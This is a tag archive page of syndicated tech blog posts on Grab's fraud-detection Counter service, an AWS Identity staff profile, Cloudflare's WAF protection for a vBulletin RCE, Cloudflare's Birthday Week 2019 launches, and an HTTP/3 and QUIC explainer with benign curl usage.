Tag Archives: security

Using Grab’s Trust Counter Service to Detect Fraud Successfully

Post Syndicated from Grab Tech original https://engineering.grab.com/using-grabs-trust-counter-service-to-detect-fraud-successfully

Background

Fraud is not a new phenomenon, but with the rise of the digital economy it has taken different and aggressive forms. Over the last decade, novel ways to exploit technology have appeared, and as a result, millions of people have been impacted and millions of dollars in revenue have been lost. According to ACFE survey, companies lost USD6.3 billion due to fraud. Organizations lose 5% of its revenue annually due to fraud.

In this blog, we take a closer look at how we developed an anti-fraud solution using the Counter service, which can be an indispensable tool in the highly complex world of fraud detection.

Anti-fraud solution using counters

At Grab, we detect fraud by deploying data science, analytics, and engineering tools to search for anomalous and suspicious transactions, or to identify high-risk individuals who are likely to commit fraud. Grab’s Trust Platform team provides a common anti-fraud solution across a variety of business verticals, such as transportation, payment, food, and safety. The team builds tools for managing data feeds, creates SDK for engineering integration, and builds rules engines and consoles for fraud detection.

One example of fraudulent behavior could be that of an individual who masquerades as both driver and passenger, and makes cashless payments to get promotions, for example, earn a one dollar rebate in the next transaction.In our system, we analyze real time booking and payment signals, compare it with the historical data of the driver and passenger pair, and create rules using the rule engine. We count the number of driver and passenger pairs at a given time frame. This counter is provided as an input to the rule.If the counter value exceeds a predefined threshold value, the rule evaluates it as a fraud transaction. We send this verdict back to the booking service.

The conventional method

Fraud detection is a job that requires cross-functional teams like data scientists, data analysts, data engineers, and backend engineers to work together. Usually data scientists or data analysts come up with an offline idea and apply it to real-time traffic. For example, a rule gets invented after brainstorming sessions by data scientists and data analysts. In the conventional method, the rule needs to be communicated to engineers.

Automated solution using the Counter service

To overcome the challenges in the conventional method, the Trust platform team decided to come out with the Counter service, a self-service platform, which provides management tools for users, and a computing engine for integrating with the backend services. This service provides an interface, such as a UI based rule editor and data feed, so that analysts can experiment and create rules without interacting with engineers. The platform team also decided to provide different data contracts, APIs, and SDKs to engineers so that the business verticals can use it quickly and easily.

The major engineering challenges faced in designing the Counter service

There are millions of transactions happening at Grab every day, which implies we needed to perform billions of fraud and safety detections. As seen from the example shared earlier, most predictions require a group of counters. In the above use case, we need to know how many counts of the cashless payment happened for a driver and passenger pair. Due to the scale of Grab’s business, the potential combinations of drivers and passengers could be exponential. However, this is only one use case. So imagine that there could be hundreds of counters for different use cases. Hence it’s important that we provide a platform for stakeholders to manage counters.

Some of the common challenges we faced were:

Scalability

As mentioned above, we could potentially have an exponential number of passengers and drivers in a single counter. So it’s a great challenge to store the counters in the database, read, and query them in real-time. When there are billions of counter keys across a long period of time, the Trust team had to find a scalable way to write and fetch keys effectively and meet the client’s SLA.

Self-serving

A counter is usually invented by data scientists or analysts and used by engineers. For example, every time a new type of counter is needed from data scientists, developers need to manually make code changes, such as adding a new stream, capturing related data sets for the counter, and storing it on the fraud service, then doing a deployment to make the counters ready. It usually takes two or more weeks for the whole iteration, and if there are any changes from the data analysts’ side, which happens often, the situation loops again. The team had to come up with a solution to prevent the long loop of manual tasks by coming out with a self-serving interface.

Manageable and extendable

Due to a lack of connection between real-time and offline data, data analysts and data scientists did not have a clear picture of what is written in the counters. That’s because the conventional counter data were stored in Redis database to satisfy the query SLA. They could not track the correctness of counter value, or its history. With the new solution, the stakeholders can get a real-time picture of what is stored in the counters using the data engineering tools.

The Machine Learning challenges solved by the Counter service

The Counter service plays an important role in our Machine Learning (ML) workflow.

Data Consistency Challenge/Issue

Most of the machine learning workflows need dedicated input data. However, when there is an anti-fraud model that is trained using offline data from the data lake, it is difficult to use the same model in real-time. This is because the model lacks the data contract and the consistency with the data source. In this case, the Counter service becomes a type of data source by providing the value of counters to file system.

ML featuring

Counters are important features for the ML models. Imagine there is a new invention of counters, which data scientists need to evaluate. We need to provide a historical data set for counters to work. The Counter service provides a counter replay feature, which allows data scientists to simulate the counters via historical payload.

In general, the Counter service is a bridge between online and offline datasets, data scientists, and engineers. There was technical debt with regards to data consistency and automation on the ML pipeline, and the Counter service closed this loop.

How we designed the Counter service

We followed the principle of asynchronized data ingestion, and synchronized transaction for designing the Counter service.

The diagram shows how the counters are generated and saved to database.

How the counters are generated and saved to the database

Counter creation workflow

  1. User opens the Counter Creation UI and creates a new key “fraud:counter:counter_name”.
  2. Configures required fields.
  3. The Counter service monitors the new counter-creation, puts a new counter into load script storage, and starts processing new counter events (see Counter Write below).

Counter write workflow

  1. The Counter service monitors multiple streams, assembles extra data from online data services (i.e. Common Data Service (CDS), passenger service, hydra service, etc), so that rich dataset would also be available for editors on each stream resource.
  2. The Counter Processor evaluates the user-configured expression and writes the evaluated values to the dedicated Grab-Stats stream using the GrabPlugin tool.

Counter read workflow

Counter read workflow

We use Grab-Stats as our storage service. Basically Grab-Stats runs above ScyllaDB, which is a distributed NoSQL data store. We use ScyllaDB because of its good performance on aggregation in memory to deal with the time series dataset. In comparison with in-memory storage like AWS elasticCache, it is 10 times cheaper and as reliable as AWS in terms of stability. The p99 of reading from ScyllaDB is less than 150ms which satisfies our SLA.

How we improved the Counter service performance

We used the multi-buckets strategy to improve the Counter service performance.

Background

There are different time windows when you perform a query. Some counters are time sensitive so that it needs to know what happened in the last 30 or 60 minutes. Some other counters focus on the long term and need to know the events in the last 30 or 90 days.

From a transactional database perspective, it’s not possible to serve small range as well as long term events at the same time. This is because the more the need for the accuracy of the data and the longer the time range, the more aggregations need to happen on database. Which means we would not be able to satisfy the SLA. Otherwise we will need to block other process which leads to the service downgrade.

Solution for improving the query

We resolved this problem by using different granularities of the tables. We pre-aggregated the signals into different time buckets, such as 15min, 1 hour, and 1 day.

When a request comes in, the time-range of the request will be divided by the buckets, and the results are conquered. For example, if there is a request for 9/10 23:15:20 to 9/12 17:20:18, the handler will query 15min buckets within the hour.  It will query for hourly buckets for the same day. And it will query the daily buckets for the rest of 2 days. This way, we avoid doing heavy aggregations, but still keep the accuracy in 15 minutes level in a scalable response time.

Counter service UI

We allowed data analysts and data scientists to onboard counters by themselves, from a dedicated web portal. After the counter is submitted, the Counter service takes care of the integration and parsing the logic at runtime.

Counter service UI

Backend integration

We provide SDK for quicker and better integration. The engineers only need to provide the counter identifier ID (which is shown in the UI) and the time duration in the query. Under the hood we provide a GRPC protocol to communicate across services. We divide the query time window to smaller granularities, fetching from different time series tables and then conquering the result. We are also providing a short TTL cache layer to take the uncommon traffic from client such as network retry or traffic throttle. Our QPS are designed to target 100K.

Monitoring the Counter service

The Counter service dashboard helps to track the human errors while editing the counters in real-time. The Counter service sends alerts to slack channel to notify users if there is any error.

Counter service dashboard

We setup Datadog for monitoring multiple system metrics. The figure below shows a portion of stream processing and counter writing. In the example below, the total stream QPS would reach 5k at peak hour, and the total counter saved to storage tier is about 4k. It will keep climbing without an upper limit, when more counters are onboarded.

Counter service dashboard with multiple metrics

The Counter service UI portal also helps users to fetch real-time counter results for verification purposes.

Counter service UI

Future plans

Here’s what we plan to do in the near future to improve the Counter service.

Close the ML workflow loop

As mentioned above, we plan to send the resource payload of the Counter service to the offline data lake, in order to complete the counter replay function for data scientists. We are working on the project called “time traveler”. As the name indicates, it is used not only for serving the online transactional data, but also supports historical data analytics, and provides more flexibility on counter inventions and experiments.

There are more automation steps we plan to do, such as adding a replay button on the web portal, and hooking up with the offline big data engine to trigger the analytics jobs. The performance metrics will be collected and displayed on the web portal. A single platform would be able to manage both the online and offline data.

Integration to Griffin

Griffin is our rule engine. Counters are sometimes an input to a particular rule, and one rule usually needs many counters to work together. We need to provide a better integration to Griffin on backend. We plan to minimize the current engineering effort when using counters on Griffin. A counter then becomes an automated input variable on Griffin, which can be configured on the web portal by any users.

AWS Security Profile: Ron Cully, Principal Product Manager, AWS Identity

Post Syndicated from Becca Crockett original https://aws.amazon.com/blogs/security/aws-security-profile-ron-cully-principal-product-manager-aws-identity/


In the weeks leading up to re:Invent, we’ll share conversations we’ve had with people at AWS who will be presenting at the event so you can learn more about them and some of the interesting work that they’re doing.


How long have you been at AWS, and what do you do in your current role?

I’ve been with AWS for nearly four years. I’m a Principal Product Manager in AWS Identity. I spent most of my time covering our Managed Active Directory products, and over the past year I’ve taken on management for AWS Single Sign-On and AWS Identity and Access Management (IAM).

How do you explain your job to non-tech friends?

Identity is what people use when they sign in to their services. What we work on is the back-end systems that authenticate and manage access so that people have secure access to their services.

What are you currently working on that you’re excited about?

Wow, it’s hard to pick just one. So, I’d say I’m most excited about the work that we’re doing so that customers can use identities that they already have across all of AWS.

What’s the most challenging part of your job?

Making sure that we deliver the most important features that customers want, in the right sequence, as quickly as possible. To do that, we need to focus on the key pain points customers have right now and resolve those pain points in ways that are the most meaningful to them. We also need to make sure that we have the right roadmap and keep doing that on an iterative basis.

What’s your favorite part of your job?

I get to work with some really incredibly smart people inside and outside of Amazon. It’s a really interesting space to be in. There’s a lot happening at the industry level, and we’re trying to sort out the puzzle of how we bring things together given what customers have and use today. Customers have all of this existing technology that they want to use, and they have a lot of investments in it. We want to make it possible for them to use those investments in new innovative ways that make their lives easier.

The AWS Identity team is growing rapidly. What are some of the biggest challenges that teams face during rapid growth?

One key challenge is hiring. How do we find great people? Amazon has some pretty high bars, and we need to find the right people that can ramp up quickly to help us solve the challenges that we want to go fix. The other thing is making sure that we stay on the same page. There’s a lot of work that we’re doing across a lot of different areas. So it’s important to stay in coordination so that we deliver the most important things that solve our customers’ current pain points.

What advice would you give to people coming on board the AWS Identity team?

Make sure that you’re highly customer focused. Dive deep because we really need to understand the details of what’s going on and what customers are trying to accomplish. Be a really effective communicator by breaking things down into the simplest terms. I find that often, people get so caught up in technology that they get lost in the technology. It’s really important to remember that we’re solving problems that are very visceral to human beings. In order to get the correct results, you need to be able to communicate in a way that makes sense to anybody.

Which Amazon leadership principles have you relied on the most in your own career at AWS?

Certainly Customer Obsession. That’s absolutely imperative. Dive Deep of course. Learn and Be Curious is huge. But also a less popular principle: Have Backbone; Disagree and Commit. It’s important that we have healthy discussions. This principle isn’t about being confrontational. It’s about being smart about how you synthesize the information that you learn from your customers and bring forth your ideas and opinions in a respectful way. It’s important to have a healthy conversational debate about what’s right for customers, so that we can drive important things forward when they need to be done. At the same time, we must recognize that not all ideas or their timing are right. It’s important to understand the bigger picture of what’s going on, understand that a different approach might be better in that particular moment, and commit to moving forward as a team after the debate is finished.

What’s the most common misperception you encounter about AWS Identity?

I think there’s a huge amount of confusion in the Active Directory area about what you can and can’t do, and how it relates to what customers are doing with Azure AD. We probably have the best managed active directory in the cloud. But, people sometimes confuse Active Directory with Azure AD, which are completely different technologies. So, we try to help customers understand how our product works relative to Azure AD. They are complementary; they can work together.

Another area that’s confusing for customers is choosing which AWS identity system to use today. AWS identity systems have grown organically over time. We’ve listened to customers and added features, and so now we have a couple of different ways of approaching identity. We started out with IAM users and groups. Then over the past few years, we’ve made it possible to use Active Directory identities in AWS. We’ve also been embracing the use of standards-based federation. Federation enables customers who use identity systems like Okta, Ping, Google, or Azure AD, to use those identities to sign into AWS. Due to this organic change, customers can choose between managing identities as IAM, create them in AWS SSO, bring them in from Active Directory by using AWS SSO, or use SAML federation through IAM. We also have the Cognito product that people have been adapting to use with IAM federation. Based on the state of where the technologies are now, it can be confusing for customers to know which identity system is the right one to use right now so they are on the right path going into the future. This is an area we are working hard to simplify and clarify for our customers.

What do you think is the biggest challenge facing the identity space right now?

I think it’s helping customers understand how to use the identity system that they have now—broadly, across all of the applications and services that they want to use—and how to provide them with a consistent experience. I think that’s one of the key industry challenges. We’ve come a long way, but there’s still a lot of road ahead of us to make that all possible at the industry level.

Looking to the future, how do you think the authorization and authentication landscape will evolve?

I think we’ll start to see more convergence on interoperable technologies for authentication. There’s some evolution already happening between the SAML model of authentication and OIDC (OpenID Connect). And I think we’ll start to see more convergence. One sticky spot in the industry right now is how to set up federation. It can be complicated and time consuming to set up, and there’s work that we’re doing in this space to help make it easier. We did a technology demonstration at identiverse last June using the Fast Federation standards draft to connect IDPs and service providers together. In our demonstration, we showed how Fast Fed makes it possible to connect AWS SSO to Google in a couple of clicks. That enables customers to use the identities they already have and use AWS SSO as their AWS integrated permissions management tool to grant access to resources across all their AWS accounts. I think Fast Fed will really help customers because today it’s so complicated to try and connect identity providers to tens or hundreds of applications.

What does identity mean to you on a personal level?

When I think about identity, it’s about who I am, and there are different contexts for that, such as who I am as a consumer or who I am as an employee. Let’s focus on who I am as an employee: Today I may have different user identities and credentials, each to a different system. I also have to manage my passwords for each of those identities. If I make a mistake and use the wrong sign-in or password, I get blocked, and I might get locked out. These things get in the way of focusing on my job. Another example is that if I change my role within a company, I need access to new resources, and there are old resources that I should no longer be able to access. It’s really a pain today for people to navigate getting my access to resources set up correctly. It can take a month before you have all of the different permissions to access the things you need. So when I look at what I want to do for customers, it’s about “how do I make it really easy for people to get access to the things they need without compromising security?” I want to make it so that people can have one identity to use, and when there’s a change to their identity, the system automatically gives them access to what they need and removes access to what they don’t need. People shouldn’t have to go through all the painful processes of going to websites and talking to managers to get them to change group membership.

Will you be doing anything at re:Invent this year?

I’m involved in a few sessions.

I’ll be talking about our single sign-on product, AWS Single Sign-On. It enables customers to centrally manage access to the AWS Console, accounts, roles, and applications using identities from their Active Directory, or identities they create in AWS SSO. We’ll be talking about some exciting new features that we’ve released in that product area since the last re:Invent.

I’m also involved in a session about how enterprises can use Active Directory in the cloud. Customers have a lot of investment in their Windows environments on premises, and they’re migrating their workloads into the cloud. As they do that, those Windows workloads in the cloud need access to Active Directory. Customers often don’t want to manage the Active Directory infrastructure in the cloud. The operational pain of doing that detracts from what they’re trying to do, which is to get to the cloud and actually convert into server-less technologies where they get better economies of scale and more flexibility. AWS offers a managed Active Directory solution that customers can use with their Windows workloads while eliminating the overhead of operating Active Directory domain controllers in the cloud.

What are you hoping that your audience will do differently as a result of attending?

I would love to see customers realize they can take advantage of the services we offer in new ways, and then go home and deploy them. I would hope that they go back and do a proof of concept—go play with it and understand what it can do, see what kind of value it can bring, and then build out from there. Armed with the right information I think customers can streamline some processes in terms of how to get on to the cloud and take advantage of the cloud faster.

What do you recommend that first-time attendees do at Re:Invent?

There’s so much amazing content that’s there, you won’t be able to get it all. So, get clear about what information you’re after, go through the session list, and get registered for the sessions. Sometimes these fill up fast! If you’re coming with a team, divide and conquer. But also leave some time to learn something new in an area you’re less familiar with. Also, take advantage of the presenters. Ask us questions! We’re here to help customers learn as much as they can. If you see me there, stop me and ask your questions!

If you had to pick any other job, what would you want to do with your life?

I would probably want to be in food safety. I used to not care about food at all. Then, I went to an event where I made a life decision that made me think about my health and made me think about my food. So I started understanding more about food. I began realizing how much happens with our food today that we just don’t know about. There are a lot of things that I really don’t align with. I would love to see more transparency about our food so that we could have the ability to pick and choose what we want to eat based upon our values. If it wasn’t food safety, maybe politics.

Want more AWS Security news? Follow us on Twitter.

The AWS Security team is hiring! Want to find out more? Check out our career page.

Ron Cully

Ron Cully is a Principal Product Manager at AWS where he leads feature and roadmap planning for workforce identity products at AWS. Ron has over 20 years of industry experience in product and program management of networking and directory related products. He is passionate about delivering secure, reliable solutions that help make it easier for customers to migrate directory aware applications and workloads to the cloud.

Cloudflare’s protection against a new Remote Code Execution vulnerability (CVE-2019-16759) in vBulletin

Post Syndicated from Alex Cruz Farmer original https://blog.cloudflare.com/cloudflares-protection-against-a-new-remote-code-execution-vulnerability-cve-2019-16759-in-vbulletin/

Cloudflare’s protection against a new Remote Code Execution vulnerability (CVE-2019-16759) in vBulletin

Cloudflare has released a new rule as part of its Cloudflare Specials Rulesets, to protect our customers against a high-severity vulnerability in vBulletin.  

A new zero-day vulnerability was discovered for vBulletin, a proprietary Internet forum software. By exploiting this vulnerability, bad actors could potentially gain privileged access and control to the host servers on which this software runs, through Remote Code Execution (RCE).

Implications of this vulnerability

At Cloudflare, we use three key indicators to understand the severity of a vulnerability 1) how many customers on Cloudflare are running the affected software 2) the Common Vulnerability Scoring System (CVSS) score, and 3) the OWASP Top 10, an open-source security framework.

We assess this vulnerability to be very significant as it has a CVSS score of 9.8/10 and affects 7 out of the 10 key risk areas of the OWASP 2017 Top 10.

Remote Code Execution is considered a type of injection, which provides the capability to potentially launch a catastrophic attack. Through RCE an attacker can gain privileged access to the host server that might be running the unpatched and vulnerable version of this software. With elevated privileges the attacker could perform malicious activities including discovery of additional vulnerabilities in the system, checks for misconfigured file permissions on configuration files and even delete logs to wipe out the possibility of audit trails to their activities.

We also have often observed attackers exploit RCE vulnerabilities to deploy malware on the host, make it part of a DDoS Botnet attack or exfiltrate valuable data stored in the system.

Cloudflare’s continuously learning Firewall has you covered

At Cloudflare, we continuously strive to improve the security posture of our customers by quickly and seamlessly mitigating vulnerabilities of this nature. Protection against common RCE attacks is a standard feature of Cloudflare’s Managed Rulesets. To provide coverage for this specific vulnerability, we have deployed a new rule within our Cloudflare Specials Rulesets (ruleId: 100166). Customers who have our Managed Rulesets and Cloudflare Specials enabled will be immediately protected against this vulnerability.

To check whether you have this protection enabled, please login, navigate to the Firewall tab and under the Managed Rulesets tab you will find the toggle to enable the WAF Managed Rulesets. See below:

Cloudflare’s protection against a new Remote Code Execution vulnerability (CVE-2019-16759) in vBulletin

Next, confirm that you have the Cloudflare Specials Rulesets enabled, by checking in the Managed Rulesets card as shown below:

Cloudflare’s protection against a new Remote Code Execution vulnerability (CVE-2019-16759) in vBulletin

Our customers who use our free services or those who don’t have Cloudflare’s Managed Rulesets turned on, can also protect themselves by deploying a patch on their own. The vBulletin team have released a security patch, the details of which can be found here.

Cloudflare’s Firewall is built on a network that continuously learns from our vast network spanning over 190 countries. In Q2’19 Cloudflare blocked an average of 44 billion cyber threats each day. Learn more about our simple, easy to use and powerful Cloudflare Firewall and protect your business today.

Birthday Week 2019 Wrap-up

Post Syndicated from Jake Anderson original https://blog.cloudflare.com/birthday-week-2019-wrap-up/

Birthday Week 2019 Wrap-up

Birthday Week 2019 Wrap-up

This week we celebrated Cloudflare’s 9th birthday by launching a variety of new offerings that support our mission: to help build a better Internet.  Below is a summary recap of how we celebrated Birthday Week 2019.

Cleaning up bad bots

Every day Cloudflare protects over 20 million Internet properties from malicious bots, and this week you were invited to join in the fight!  Now you can enable “bot fight mode” in the Firewall settings of the Cloudflare Dashboard and we’ll start deploying CPU intensive code to traffic originating from malicious bots.  This wastes the bots’ CPU resources and makes it more difficult and costly for perpetrators to deploy malicious bots at scale. We’ll also share the IP addresses of malicious bot traffic with our Bandwidth Alliance partners, who can help kick malicious bots offline. Join us in the battle against bad bots – and, as you can read here – you can help the climate too!

Browser Insights

Speed matters, and if you manage a website or app, you want to make sure that you’re delivering a high performing website to all of your global end users. Now you can enable Browser Insights in the Speed section of the Cloudflare Dashboard to analyze website performance from the perspective of your users’ web browsers.  

WARP, the wait is over

Several months ago we announced WARP, a free mobile app purpose-built to address the security and performance challenges of the mobile Internet, while also respecting user privacy.  After months of testing and development, this week we (finally) rolled out WARP to approximately 2 million wait-list customers.  We also enabled Warp Plus, a WARP experience that uses Argo routing technology to route your mobile traffic across faster, less-congested, routes through the Internet.  Warp and Warp Plus (Warp+) are now available in the iOS and Android App stores and we can’t wait for you to give it a try!

HTTP/3 Support

Last year we announced early support for QUIC, a UDP based protocol that aims to make everything on the Internet work faster, with built-in encryption. The IETF subsequently decided that QUIC should be the foundation of the next generation of the HTTP protocol, HTTP/3. This week, Cloudflare was the first to introduce support for HTTP/3 in partnership with Google Chrome and Mozilla.

Workers Sites

Finally, to wrap up our birthday week announcements, we announced Workers Sites. The Workers serverless platform continues to grow and evolve, and every day we discover new and innovative ways to help developers build and optimize their applications. Workers Sites enables developers to easily deploy lightweight static sites across Cloudflare’s global cloud platform without having to build out the traditional backend server infrastructure to support these sites.

We look forward to Birthday Week every year, as a chance to showcase some of our exciting new offerings — but we all know building a better Internet is about more than one week.  It’s an effort that takes place all year long, and requires the help of our partners, employees and especially you — our customers. Thank you for being a customer, providing valuable feedback and helping us stay focused on our mission to help build a better Internet.

Can’t get enough of this week’s announcements, or want to learn more? Register for next week’s Birthday Week Recap webinar to get the inside scoop on every announcement.

HTTP/3: the past, the present, and the future

Post Syndicated from Alessandro Ghedini original https://blog.cloudflare.com/http3-the-past-present-and-future/

HTTP/3: the past, the present, and the future

During last year’s Birthday Week we announced preliminary support for QUIC and HTTP/3 (or “HTTP over QUIC” as it was known back then), the new standard for the web, enabling faster, more reliable, and more secure connections to web endpoints like websites and APIs. We also let our customers join a waiting list to try QUIC and HTTP/3 as soon as they became available.

HTTP/3: the past, the present, and the future

Since then, we’ve been working with industry peers through the Internet Engineering Task Force, including Google Chrome and Mozilla Firefox, to iterate on the HTTP/3 and QUIC standards documents. In parallel with the standards maturing, we’ve also worked on improving support on our network.

We are now happy to announce that QUIC and HTTP/3 support is available on the Cloudflare edge network. We’re excited to be joined in this announcement by Google Chrome and Mozilla Firefox, two of the leading browser vendors and partners in our effort to make the web faster and more reliable for all.

In the words of Ryan Hamilton, Staff Software Engineer at Google, “HTTP/3 should make the web better for everyone. The Chrome and Cloudflare teams have worked together closely to bring HTTP/3 and QUIC from nascent standards to widely adopted technologies for improving the web. Strong partnership between industry leaders is what makes Internet standards innovations possible, and we look forward to our continued work together.”

What does this mean for you, a Cloudflare customer who uses our services and edge network to make your web presence faster and more secure? Once HTTP/3 support is enabled for your domain in the Cloudflare dashboard, your customers can interact with your websites and APIs using HTTP/3. We’ve been steadily inviting customers on our HTTP/3 waiting list to turn on the feature (so keep an eye out for an email from us), and in the coming weeks we’ll make the feature available to everyone.

What does this announcement mean if you’re a user of the Internet interacting with sites and APIs through a browser and other clients? Starting today, you can use Chrome Canary to interact with Cloudflare and other servers over HTTP/3. For those of you looking for a command line client, curl also provides support for HTTP/3. Instructions for using Chrome and curl with HTTP/3 follow later in this post.

The Chicken and the Egg

Standards innovation on the Internet has historically been difficult because of a chicken and egg problem: which needs to come first, server support (like Cloudflare, or other large sources of response data) or client support (like browsers, operating systems, etc)? Both sides of a connection need to support a new communications protocol for it to be any use at all.

Cloudflare has a long history of driving web standards forward, from HTTP/2 (the version of HTTP preceding HTTP/3), to TLS 1.3, to things like encrypted SNI. We’ve pushed standards forward by partnering with like-minded organizations who share in our desire to help build a better Internet. Our efforts to move HTTP/3 into the mainstream are no different.

Throughout the HTTP/3 standards development process, we’ve been working closely with industry partners to build and validate client HTTP/3 support compatible with our edge support. We’re thrilled to be joined by Google Chrome and curl, both of which can be used today to make requests to the Cloudflare edge over HTTP/3. Mozilla Firefox expects to ship support in a nightly release soon as well.

Bringing this all together: today is a good day for Internet users; widespread rollout of HTTP/3 will mean a faster web experience for all, and today’s support is a large step toward that.

More importantly, today is a good day for the Internet: Chrome, curl, and Cloudflare, and soon, Mozilla, rolling out experimental but functional, support for HTTP/3 in quick succession shows that the Internet standards creation process works. Coordinated by the Internet Engineering Task Force, industry partners, competitors, and other key stakeholders can come together to craft standards that benefit the entire Internet, not just the behemoths.

Eric Rescorla, CTO of Firefox, summed it up nicely: “Developing a new network protocol is hard, and getting it right requires everyone to work together. Over the past few years, we’ve been working with Cloudflare and other industry partners to test TLS 1.3 and now HTTP/3 and QUIC. Cloudflare’s early server-side support for these protocols has helped us work the interoperability kinks out of our client-side Firefox implementation. We look forward to advancing the security and performance of the Internet together.”

HTTP/3: the past, the present, and the future

How did we get here?

Before we dive deeper into HTTP/3, let’s have a quick look at the evolution of HTTP over the years in order to better understand why HTTP/3 is needed.

It all started back in 1996 with the publication of the HTTP/1.0 specification which defined the basic HTTP textual wire format as we know it today (for the purposes of this post I’m pretending HTTP/0.9 never existed). In HTTP/1.0 a new TCP connection is created for each request/response exchange between clients and servers, meaning that all requests incur a latency penalty as the TCP and TLS handshakes are completed before each request.

HTTP/3: the past, the present, and the future

Worse still, rather than sending all outstanding data as fast as possible once the connection is established, TCP enforces a warm-up period called “slow start”, which allows the TCP congestion control algorithm to determine the amount of data that can be in flight at any given moment before congestion on the network path occurs, and avoid flooding the network with packets it can’t handle. But because new connections have to go through the slow start process, they can’t use all of the network bandwidth available immediately.

The HTTP/1.1 revision of the HTTP specification tried to solve these problems a few years later by introducing the concept of “keep-alive” connections, that allow clients to reuse TCP connections, and thus amortize the cost of the initial connection establishment and slow start across multiple requests. But this was no silver bullet: while multiple requests could share the same connection, they still had to be serialized one after the other, so a client and server could only execute a single request/response exchange at any given time for each connection.

As the web evolved, browsers found themselves needing more and more concurrency when fetching and rendering web pages as the number of resources (CSS, JavaScript, images, …) required by each web site increased over the years. But since HTTP/1.1 only allowed clients to do one HTTP request/response exchange at a time, the only way to gain concurrency at the network layer was to use multiple TCP connections to the same origin in parallel, thus losing most of the benefits of keep-alive connections. While connections would still be reused to a certain (but lesser) extent, we were back at square one.

Finally, more than a decade later, came SPDY and then HTTP/2, which, among other things, introduced the concept of HTTP “streams”: an abstraction that allows HTTP implementations to concurrently multiplex different HTTP exchanges onto the same TCP connection, allowing browsers to more efficiently reuse TCP connections.

HTTP/3: the past, the present, and the future

But, yet again, this was no silver bullet! HTTP/2 solves the original problem — inefficient use of a single TCP connection — since multiple requests/responses can now be transmitted over the same connection at the same time. However, all requests and responses are equally affected by packet loss (e.g. due to network congestion), even if the data that is lost only concerns a single request. This is because while the HTTP/2 layer can segregate different HTTP exchanges on separate streams, TCP has no knowledge of this abstraction, and all it sees is a stream of bytes with no particular meaning.

The role of TCP is to deliver the entire stream of bytes, in the correct order, from one endpoint to the other. When a TCP packet carrying some of those bytes is lost on the network path, it creates a gap in the stream and TCP needs to fill it by resending the affected packet when the loss is detected. While doing so, none of the successfully delivered bytes that follow the lost ones can be delivered to the application, even if they were not themselves lost and belong to a completely independent HTTP request. So they end up getting unnecessarily delayed as TCP cannot know whether the application would be able to process them without the missing bits. This problem is known as “head-of-line blocking”.

Enter HTTP/3

This is where HTTP/3 comes into play: instead of using TCP as the transport layer for the session, it uses QUIC, a new Internet transport protocol, which, among other things, introduces streams as first-class citizens at the transport layer. QUIC streams share the same QUIC connection, so no additional handshakes and slow starts are required to create new ones, but QUIC streams are delivered independently such that in most cases packet loss affecting one stream doesn’t affect others. This is possible because QUIC packets are encapsulated on top of UDP datagrams.

Using UDP allows much more flexibility compared to TCP, and enables QUIC implementations to live fully in user-space — updates to the protocol’s implementations are not tied to operating systems updates as is the case with TCP. With QUIC, HTTP-level streams can be simply mapped on top of QUIC streams to get all the benefits of HTTP/2 without the head-of-line blocking.

QUIC also combines the typical 3-way TCP handshake with TLS 1.3‘s handshake. Combining these steps means that encryption and authentication are provided by default, and also enables faster connection establishment. In other words, even when a new QUIC connection is required for the initial request in an HTTP session, the latency incurred before data starts flowing is lower than that of TCP with TLS.

HTTP/3: the past, the present, and the future

But why not just use HTTP/2 on top of QUIC, instead of creating a whole new HTTP revision? After all, HTTP/2 also offers the stream multiplexing feature. As it turns out, it’s somewhat more complicated than that.

While it’s true that some of the HTTP/2 features can be mapped on top of QUIC very easily, that’s not true for all of them. One in particular, HTTP/2’s header compression scheme called HPACK, heavily depends on the order in which different HTTP requests and responses are delivered to the endpoints. QUIC enforces delivery order of bytes within single streams, but does not guarantee ordering among different streams.

This behavior required the creation of a new HTTP header compression scheme, called QPACK, which fixes the problem but requires changes to the HTTP mapping. In addition, some of the features offered by HTTP/2 (like per-stream flow control) are already offered by QUIC itself, so they were dropped from HTTP/3 in order to remove unnecessary complexity from the protocol.

HTTP/3, powered by a delicious quiche

QUIC and HTTP/3 are very exciting standards, promising to address many of the shortcomings of previous standards and ushering in a new era of performance on the web. So how do we go from exciting standards documents to working implementation?

Cloudflare’s QUIC and HTTP/3 support is powered by quiche, our own open-source implementation written in Rust.

HTTP/3: the past, the present, and the future

You can find it on GitHub at github.com/cloudflare/quiche.

We announced quiche a few months ago and since then have added support for the HTTP/3 protocol, on top of the existing QUIC support. We have designed quiche in such a way that it can now be used to implement HTTP/3 clients and servers or just plain QUIC ones.

How do I enable HTTP/3 for my domain?

As mentioned above, we have started on-boarding customers that signed up for the waiting list. If you are on the waiting list and have received an email from us communicating that you can now enable the feature for your websites, you can simply go to the Cloudflare dashboard and flip the switch from the “Network” tab manually:

HTTP/3: the past, the present, and the future

We expect to make the HTTP/3 feature available to all customers in the near future.

Once enabled, you can experiment with HTTP/3 in a number of ways:

Using Google Chrome as an HTTP/3 client

In order to use the Chrome browser to connect to your website over HTTP/3, you first need to download and install the latest Canary build. Then all you need to do to enable HTTP/3 support is starting Chrome Canary with the “–enable-quic” and “–quic-version=h3-23” command-line arguments.

Once Chrome is started with the required arguments, you can just type your domain in the address bar, and see it loaded over HTTP/3 (you can use the Network tab in Chrome’s Developer Tools to check what protocol version was used). Note that due to how HTTP/3 is negotiated between the browser and the server, HTTP/3 might not be used for the first few connections to the domain, so you should try to reload the page a few times.

If this seems too complicated, don’t worry, as the HTTP/3 support in Chrome will become more stable as time goes on, enabling HTTP/3 will become easier.

This is what the Network tab in the Developer Tools shows when browsing this very blog over HTTP/3:

HTTP/3: the past, the present, and the future

Note that due to the experimental nature of the HTTP/3 support in Chrome, the protocol is actually identified as “http2+quic/99” in Developer Tools, but don’t let that fool you, it is indeed HTTP/3.

Using curl

The curl command-line tool also supports HTTP/3 as an experimental feature. You’ll need to download the latest version from git and follow the instructions on how to enable HTTP/3 support.

If you’re running macOS, we’ve also made it easy to install an HTTP/3 equipped version of curl via Homebrew:

 % brew install --HEAD -s https://raw.githubusercontent.com/cloudflare/homebrew-cloudflare/master/curl.rb

In order to perform an HTTP/3 request all you need is to add the “–http3” command-line flag to a normal curl command:

 % ./curl -I https://blog.cloudflare.com/ --http3
HTTP/3 200
date: Tue, 17 Sep 2019 12:27:07 GMT
content-type: text/html; charset=utf-8
set-cookie: __cfduid=d3fc7b95edd40bc69c7d894d296564df31568723227; expires=Wed, 16-Sep-20 12:27:07 GMT; path=/; domain=.blog.cloudflare.com; HttpOnly; Secure
x-powered-by: Express
cache-control: public, max-age=60
vary: Accept-Encoding
cf-cache-status: HIT
age: 57
